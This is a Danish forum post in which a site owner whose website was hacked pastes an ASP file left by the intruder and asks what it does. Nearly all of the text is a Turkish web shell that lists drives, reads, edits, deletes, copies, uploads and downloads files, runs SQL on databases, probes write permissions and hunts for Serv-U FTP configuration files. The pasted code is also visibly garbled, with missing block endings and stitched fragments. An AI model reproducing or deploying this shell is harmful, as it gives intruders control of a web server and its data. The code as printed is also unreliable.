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07. juni 2005 - 19:29 Der er 1 kommentar

Hacket hjemmeside

Jeg ved ikke om det er den rigtige gruppe jeg skriver dette i, men min hjemmeside er blevet hacket, jeg har fået skiftet deafault.asp siden ud, så det er væk MEN vedkommende har uploaded en fil til godkendelse for senere download og jeg synes den ser lidt "trickie" ud. Det har hvert fald ikke noget  med min side at gøre. Jeg paster den lige her, så vil jeg gerne have en tilbagemelding om hvad dette asp script gør og om jeg kan finde af hvor det kommer fra.


Private Function GetFileName(strFilePath)
    Dim intPos
    GetFileName = strFilePath
    For intPos = Len(strFilePath) To 1 Step -1
        If Mid(strFilePath, intPos, 1) = "\" Or Mid(strFilePath, intPos, 1) = ":" Then
            GetFileName = Right(strFilePath, Len(strFilePath) - intPos)
            Exit Function
        End If
End Function
dosyaPath = GetFileName(Request.ServerVariables("PATH_TRANSLATED"))
on error resume next
Dim objFSO,popup
Set objFSO = CreateObject ("Scripting.FileSystemObject")
status = Request("status")
path  = Request("path")
dPath  = Request("dPath")
arama  = Request("txArama")
dkayit = Request("dkayit")
table  = Request("table")
del    = Request("del")
islem  = Request("islem")
strSQL = Request("strSQL")
cf      = Request("cf")
pathfile = request("pathfile")
if path="" and status="" then path=request.servervariables("APPL_PHYSICAL_PATH"):status=2
popup = true
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
End Function
if status="-3" then
Set Fil = objFSO.GetFile(pathfile)

Response.AddHeader "Cache-control","private"
Response.AddHeader "Content-Length", Fil.Size
Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name

Response.BinaryWrite readBinaryFile(Fil.path)
Set f = Nothing: Set Fil = Nothing
end if
Class clsUpload
Private mbinData
Private mlngChunkIndex
Private mlngBytesReceived
Private mstrDelimiter
Private CR
Private LF
Private CRLF
Private mobjFieldAry()
Private mlngCount

Private Sub RequestData
Dim llngLength
mlngBytesReceived = Request.TotalBytes
mbinData = Request.BinaryRead(mlngBytesReceived)
End Sub

Private Sub ParseDelimiter()
mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
End Sub

Private Sub ParseData()
Dim llngStart
Dim llngLength
Dim llngEnd
Dim lbinChunk
llngStart = 1
llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
While Not llngStart = 0
llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
llngLength = llngEnd - llngStart
lbinChunk = MidB(mbinData, llngStart, llngLength)
Call ParseChunk(lbinChunk)
llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
End Sub

Private Sub ParseChunk(ByRef pbinChunk)
Dim lstrName
Dim lstrFileName
Dim lstrContentType
Dim lbinData
Dim lstrDisposition
Dim lstrValue
lstrDisposition = ParseDisposition(pbinChunk)
lstrName = ParseName(lstrDisposition)
lstrFileName = ParseFileName(lstrDisposition)
lstrContentType = ParseContentType(pbinChunk)
If lstrContentType = "" Then
lstrValue = CStrU(ParseBinaryData(pbinChunk))
lbinData = ParseBinaryData(pbinChunk)
End If
Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
End Sub

Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
Dim lobjField
ReDim Preserve mobjFieldAry(mlngCount)
Set lobjField = New clsField
lobjField.Name = pstrName
lobjField.FilePath = pstrFileName               
lobjField.ContentType = pstrContentType
If LenB(pbinData) = 0 Then
lobjField.BinaryData = ChrB(0)
lobjField.Value = pstrValue
lobjField.Length = Len(pstrValue)
lobjField.BinaryData = pbinData
lobjField.Length = LenB(pbinData)
lobjField.Value = ""
End If
Set mobjFieldAry(mlngCount) = lobjField
mlngCount = mlngCount + 1
End Sub

Private Function ParseBinaryData(ByRef pbinChunk)
Dim llngStart
llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
If llngStart = 0 Then Exit Function
llngStart = llngStart + 4
ParseBinaryData = MidB(pbinChunk, llngStart)
End Function

Private Function ParseContentType(ByRef pbinChunk)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 15
If llngStart >= llngEnd Then Exit Function
llngLength = llngEnd - llngStart
ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
End Function

Private Function ParseDisposition(ByRef pbinChunk)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 22
If llngStart >= llngEnd Then Exit Function
llngLength = llngEnd - llngStart
ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
End Function

Private Function ParseName(ByRef pstrDisposition)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStr(llngStart + 6, pstrDisposition, """")
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 6
If llngStart >= llngEnd Then Exit Function
llngLength = llngEnd - llngStart
ParseName = Mid(pstrDisposition, llngStart, llngLength)
End Function
' ------------------------------------------------------------------------------
Private Function ParseFileName(ByRef pstrDisposition)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStr(llngStart + 10, pstrDisposition, """")
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 10
If llngStart >= llngEnd Then Exit Function
llngLength = llngEnd - llngStart
ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
End Function

Public Property Get Count()
Count = mlngCount
End Property

Public Default Property Get Fields(ByVal pstrName)
Dim llngIndex
If IsNumeric(pstrName) Then
llngIndex = CLng(pstrName)
If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
Exit Property
End If
Set Fields = mobjFieldAry(pstrName)
pstrName = LCase(pstrname)
For llngIndex = 0 To mlngCount - 1
If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
Set Fields = mobjFieldAry(llngIndex)
Exit Property
End If
End If
Set Fields = New clsField
End Property

Private Sub Class_Terminate()
Dim llngIndex
For llngIndex = 0 To mlngCount - 1
Set mobjFieldAry(llngIndex) = Nothing

ReDim mobjFieldAry(-1)
End Sub

Private Sub Class_Initialize()
ReDim mobjFieldAry(-1)
CR = ChrB(Asc(vbCr))
LF = ChrB(Asc(vbLf))
mlngCount = 0
Call RequestData
Call ParseDelimiter()
Call ParseData
End Sub

Private Function CStrU(ByRef pstrANSI)
Dim llngLength
Dim llngIndex
llngLength = LenB(pstrANSI)
For llngIndex = 1 To llngLength
CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
End Function

Private Function CStrB(ByRef pstrUnicode)
Dim llngLength
Dim llngIndex
llngLength = Len(pstrUnicode)
For llngIndex = 1 To llngLength
CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
End Function
End Class
Class clsField
Public Name
Private mstrPath
Public FileDir
Public FileExt
Public FileName
Public ContentType
Public Value
Public BinaryData
Public Length
Private mstrText

Public Property Get BLOB()
BLOB = BinaryData
End Property

Public Function BinaryAsText()
Dim lbinBytes
Dim lobjRs
If Length = 0 Then Exit Function
If LenB(BinaryData) = 0 Then Exit Function

If Not Len(mstrText) = 0 Then
BinaryAsText = mstrText
Exit Function
End If
lbinBytes = ASCII2Bytes(BinaryData)
mstrText = Bytes2Unicode(lbinBytes)
BinaryAsText = mstrText
End Function

Public Sub SaveAs(ByRef pstrFileName)
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
Dim lobjStream
Dim lobjRs
Dim lbinBytes
If Length = 0 Then Exit Sub
If LenB(BinaryData) = 0 Then Exit Sub
Set lobjStream = Server.CreateObject("ADODB.Stream")
lobjStream.Type = adTypeBinary
Call lobjStream.Open()
lbinBytes = ASCII2Bytes(BinaryData)
Call lobjStream.Write(lbinBytes)

On Error Resume Next

Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)

'if err<>0 then response.Write "<br>"&err.Description

Call lobjStream.Close()
Set lobjStream = Nothing
End Sub

Public Property Let FilePath(ByRef pstrPath)
mstrPath = pstrPath
If Not InStrRev(pstrPath, ".") = 0 Then
FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
FileExt = UCase(FileExt)
End If
If Not InStrRev(pstrPath, "\") = 0 Then
FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
End If
If Not InStrRev(pstrPath, "\") = 0 Then
FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
End If
End Property

Public Property Get FilePath()
FilePath = mstrPath
End Property

private Function ASCII2Bytes(ByRef pbinBinaryData)
Const adLongVarBinary=205
Dim lobjRs
Dim llngLength
Dim lbinBuffer
llngLength = LenB(pbinBinaryData)
Set lobjRs = Server.CreateObject("ADODB.Recordset")
Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
Call lobjRs.Open()
Call lobjRs.AddNew()
Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
Call lobjRs.Update()
lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
Call lobjRs.Close()
Set lobjRs = Nothing
ASCII2Bytes = lbinBuffer
End Function

Private Function Bytes2Unicode(ByRef pbinBytes)
Dim lobjRs
Dim llngLength
Dim lstrBuffer
llngLength = LenB(pbinBytes)
Set lobjRs = Server.CreateObject("ADODB.Recordset")
Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
Call lobjRs.Open()
Call lobjRs.AddNew()
Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
Call lobjRs.Update()
lstrBuffer = lobjRs.Fields("BinaryData").Value
Call lobjRs.Close()
Set lobjRs = Nothing
Bytes2Unicode = lstrBuffer
End Function
End Class
function addslash(path)
if right(path,1)="\" then addslash=path else addslash=path & "\"
end function

sub Upload()
dim objUpload,f,max,i,name,path,size,success

set objUpload=New clsUpload


for i=1 to max
name=objUpload.Fields("file" & i).FileName
size=objUpload.Fields("file" & i).Length
if (name<>"") and (size>0) then
gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
path=addslash(targetPath) & name
objUpload.Fields("file" & i).SaveAs path

if objFSO.FileExists(path) then
on error resume next
set f=objFSO.GetFile(path)
if IsObject(f) then
if f.Size=size then success=true else success=false
end if
set f=nothing
end if
if success then  gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
end if
response.Write gMsg
set objUpload=nothing

end sub

if status="-4" then
'    hataKontrol
end if
sub hataKontrol
if err<>0 then
Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
end if
end sub

sub araBul(path_,ara_)
on error resume next
If Len(path_) > 0 Then
cur = path_&"\"
If cur = "\\" Then cur = ""
parent = ""
If InStrRev(cur,"\") > 0 Then
parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
End If
cur = ""
End If

Set f = objFSO.GetFolder(cur)

Set fc = f.Files
For Each f1 In fc
if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
downStr = "<font face=webdings size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
if lcase(ara_)="mdb" then
Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font> * <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font> - <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
end if
end if

Set fs = f.SubFolders
For Each f1 In fs
araBul f1.path,ara_
Set    f        = Nothing
Set fc        = Nothing
Set fs        = Nothing
end sub

sub sistemTest
response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
response.Write "<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%' align=center><font color=navy><b>Sonuç</td></tr>"


response.Write "</table>"
end sub

sub servu_Test
dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u daemon.ini")
for each drive_ in objFSO.Drives
if drive_.Drivetype=2 or drive_.Drivetype=3 then
for each d_ in dosya_
d_ = drive_.DriveLetter&":\"&d_
if objFSO.FileExists(d_) then
response.Write "<tr><td><b>Serv-U ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
end if
end if
end sub

function yaziyomu(yol)
on error goto 0:on error resume next
dim sonuc__
objFSO.CopyFile request.servervariables("PATH_TRANSLATED"),yol & "\test.zehir"
if err<>0 then
sonuc__="<font color=red>Yazma Hakký Yok!</font>"
sonuc__="<font color=yellow>Yazma Hakký Var!</font>"
on error goto 0: on error resume next
objFSO.DeleteFile yol & "\test.zehir",true
if err<>0 then
sonuc__=sonuc__&"<br><font color=red>Silme Hakký Yok!</font>"
sonuc__=sonuc__&"<br><font color=yellow>Silme Hakký Var!</font>"
end if
end if
yaziyomu = sonuc__
end function

function yaziyomu2(yol)
on error goto 0:on error resume next
objFSO.CopyFile request.servervariables("PATH_TRANSLATED"),yol & "\test.zehir"
if err<>0 then
yaziyomu2 = false
objFSO.DeleteFile yol & "\test.zehir"
yaziyomu2 = true
end if
end function

sub WriteTestOnDriver
for each drive_ in objFSO.Drives
if drive_.Drivetype=2 or drive_.Drivetype=3 then
if not yaziyomu2(drive_.DriveLetter&":\") then
Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
end if
end if
end sub

sub WriteTestOnLocalPath
on error goto 0
on error resume next
if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then
Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
Response.Write "<tr><td><b>Local Path </td><td><font color=yellow>yazma yetkisi var!</td></tr>"
end if
end sub

sub LocalPathParentFolder
on error goto 0
on error resume next
hed_ = request.servervariables("APPL_PHYSICAL_PATH")
if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
parhed_ = left(hed_,InStrRev(hed_,"\"))

Set f = objFSO.GetFolder(parhed_)
Set fc = f.SubFolders

For Each f1 In fc

Set fc = f.files
For Each f1 In fc

if err<>0 then
Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=red>Hata Oluþtu : ["&err.Description&"]</td></tr>"
Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
end if
end sub

sub LocalPathPParentFolder
on error goto 0
on error resume next
hed_ = request.servervariables("APPL_PHYSICAL_PATH")
if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
hed_ = left(hed_,InStrRev(hed_,"\"))
if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
parhed_ = left(hed_,InStrRev(hed_,"\"))

Set f = objFSO.GetFolder(parhed_)
Set fc = f.SubFolders
For Each f1 In fc

Set fc = f.files
For Each f1 In fc

if err<>0 then
if err=451 then
Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Data Üst Klasor Yok :)</td></tr>"
Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Hata Oluþtu : ["&err.Description&"]</td></tr>"
end if
Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
end if
end sub

CASE 13 'Sistem Bilgisi
Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
Response.Write "<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>User Agent</td><td> " & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>Log Root</td><td> " & request.servervariables("APPL_MD_PATH") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
Response.Write "</table>"
popup = false
CASE 14 'Upload and Search
popup = false
CASE 15 'Ms. SQL Server
Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server için connection string giriniz</td></tr><tr><td align=center>"
Response.Write "<input type=hidden value='7' name=status><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:250; height:21' value='' name=path><br>"
response.Write "<input type=submit value='SQL Servera Baðlan' style='height:23;width:170' id=submit1 name=submit1>"
Response.Write "</td></tr></table>"
response.Write "</form>"

popup = false
CASE 16 'file Copy window
Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
Response.Write "<input type=hidden value='17' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
response.Write "<input type=radio name='islem' value='tasi'>Tasi"
response.Write "</table>"
response.Write "</form>"

popup = false
CASE 17 'file Copy
isl = ""
if islem="kopyala" then
objFSO.CopyFile path,cf
elseif islem="tasi" then
objFSO.MoveFile path,cf
end if
response.Write "Dosya "&isl
response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
response.Write "<br>"
popup = false
CASE 18 'folder Copy window
Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
response.Write "<input type=radio name='islem' value='tasi'>Tasi"
response.Write "</table>"
response.Write "</form>"

popup = false
CASE 19 'folder Copy
isl = ""
if islem="kopyala" then
objFSO.CopyFolder path,cf
elseif islem="tasi" then
objFSO.MoveFolder path,cf
end if
response.Write "Klasor "&isl
response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
response.Write "<br>"
popup = false
CASE 33 'Powered By
response.Write "<center><h4>Powered By <a href='mailto:zehirhacker@hotmail.com'>Zehir</a>"
response.Write "<br><font style='FONT-WEIGHT:normal' size=2><a href='www.cyber-warrior.org</a>"" target="_blank">http://www.cyber-warrior.org'>www.cyber-warrior.org</a>"
response.Write "<br><br><font color=red>artýk hackerlýðýn bir anlamý yok benim için!<br>birgün sizin içinde bir anlam taþýmayacak!<br>by zehir;)"
popup = false
CASE 40 'Sistem Test
CASE 50 'Siteleri Hackleyelim :D
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if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
function ffd(yol){
<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse vlink=Chartreuse>
if popup then
if status=7 or status=8 then
Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td width=100 bgcolor=gray><font size=2>SQL Çalýþtýr</td><td>"
Response.Write "<input type=hidden value='9' name=status><input type=hidden value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:350; height:21' value='' name=strSQL><input type=submit value='Çalýþtýr' style='height:22;width:70' id=submit1 name=submit1>"
Response.Write "</td></tr></table></form>"
end if
Response.Write "<form method=get action='"&DosyPath&"'>"
Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td bgcolor=gray width=100><font size=2>Hizli Erisim : </td><td>"
Response.Write "<input type=hidden value='2' name=status><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:350; height:21' value='"&Path&"' name=Path><input type=submit value='Git' style='height:22;width:70' id=submit1 name=submit1>"
Response.Write "</td></tr></table></form><br>"
end if
sub aramaUpload
Response.Write "<form method=get target='_opener' action='"&DosyPath&"'>"
Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>Arama : </td><td>"
Response.Write "&nbsp;<input type=hidden value='12' name=status><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input type=hidden value='"&Path&"' name=Path><input style='width:250' value='mdb' name=txArama><input style='width:70; height:22' type=submit value='Ara'>"
Response.Write "</td></tr></table></form>"
<form name=frmUpload method=post enctype="multipart/form-data" action="<%=DosyaPath&"?status=-4&Time="&time&"&Path="&path%>" ID="Form1">
<input type=hidden name=folder value="<%=Path%>" ID="Hidden1">
Max: <input type=text name=max value=5 size=5 ID="Text1"> <input type=button value="Ayarla" onclick="setid()" ID="Button1" NAME="Button1">
<table ID="Table1">
<td id=upid>
<input type=submit value=Upload ID="Submit1" NAME="Submit1">

function setid() {
if (frmUpload.max.value<=0) frmUpload.max.value=1;
for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
end sub
CASE 1 'Driver Open
if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
Response.Write "<table width=100% ><tr>"
Path = Path & ":/"
Response.Write "<td valign=top>"
Response.Write "</td><td valign=top align=right>"
Response.Write "</td>"
CASE 2 'Normal listeleme
if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
Response.Write "<table width=100% ><tr>"
Response.Write "<td valign=top>"
Response.Write "</td><td valign=top align=right>"
Response.Write "</td>"
CASE 3 'File Delete
objFSO.DeleteFile del
'    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time
CASE 4 'Folder Delete
objFSO.DeleteFolder del
'    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time
CASE 5 'Dosya içeriðini görüntüle
Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
Response.Write "<table width=100% ><tr><td>"
set f = objFSO.OpenTextFile(path,1)
Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
if err<>62 then hataKontrol
if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya Okunamýyor\nSistem dosyasý olabilir')</script>":Response.End
CASE 6 'Resim aç
Response.Write "<center><img ALT='zehirhacker@hotmail.com' src='"&resimYol(path)&"'></center><br>"
CASE 7 'database tablo listele
Response.Write "<b><font size=3>Tablolar</font></br><br>"
Set objConn = Server.CreateObject("ADODB.Connection")
Set objADOX = Server.CreateObject("ADOX.Catalog")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objADOX.ActiveConnection = objConn

For Each table in objADOX.Tables
If table.Type = "TABLE" Then
Response.Write "<font face=wingdings size=5>4</font> <a href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a><br>"
End If
CASE 8 'database kayýt listele
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objRcs.Open table,objConn, adOpenKeyset , , adCmdText

Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
for i=0 to objRcs.Fields.count-1
Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
Response.Write "</tr>"
do while not objRcs.EOF
Response.Write "<tr>"
for i=0 to objRcs.Fields.count-1
Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
Response.Write "</tr>"
Response.Write "</table><br>"
CASE 9 'SQL Execute
Set objConn = Server.CreateObject("ADODB.Connection")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Path
objConn.Execute strSQL
'    Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
CASE 10 'Dosya Editleme
set f = objFSO.OpenTextFile(dPath,1)
Response.Write "<center><form action='"&DosyPath&"?Time="&time&"' method=post>"
Response.Write "<input type=hidden name=status value='11'>"
Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"
Response.Write "<input type=hidden name=Path  value='"&Path &"'>"
Response.Write "<input type=submit value=Kaydet><br>"
Response.Write "<textarea name=dkayit style='width:90%;height:350;border-right: lightgoldenrodyellow thin solid;border-top: lightgoldenrodyellow thin solid;font-size: 12;border-left: lightgoldenrodyellow thin solid;color: lime;    border-bottom: lightgoldenrodyellow thin solid;    font-family: Courier New, Arial;background-color: navy;'>"
Response.Write server.HTMLEncode(f.readAll)
Response.Write "</textarea></form></center>"
CASE 11 'Dosya Kayýt
set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
'    Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time
CASE 12 'Dosya Arama
araBul path,arama
Response.Write "</tr></table>"

sub DosyaOku
Set f = objFSO.GetFolder(Path)
Set fc = f.Files
For Each f1 In fc
dosyaAdi = f1.name
num = InStrRev(dosyaAdi,".")
uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
downStr = "<a href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a><font face=webdings><a href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>Í</a></font><font face=wingdings><a href='"&dosyaPath&"?status=16&PathFile="&f1.path&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font>"
response.Write "<font size=2>"
select case uzanti
case "mdb"
Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M  "&downStr&"</font><br>"
case "asp"
Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
case "jpg","gif"
Response.Write "<a href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>¢</font><font face=wingdings size=4>  "&downStr&"</font><br>"
case else
Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
end select
end sub

sub KlasorOku
Set f = objFSO.GetFolder(Path)
Set fc = f.SubFolders
For Each f1 In fc
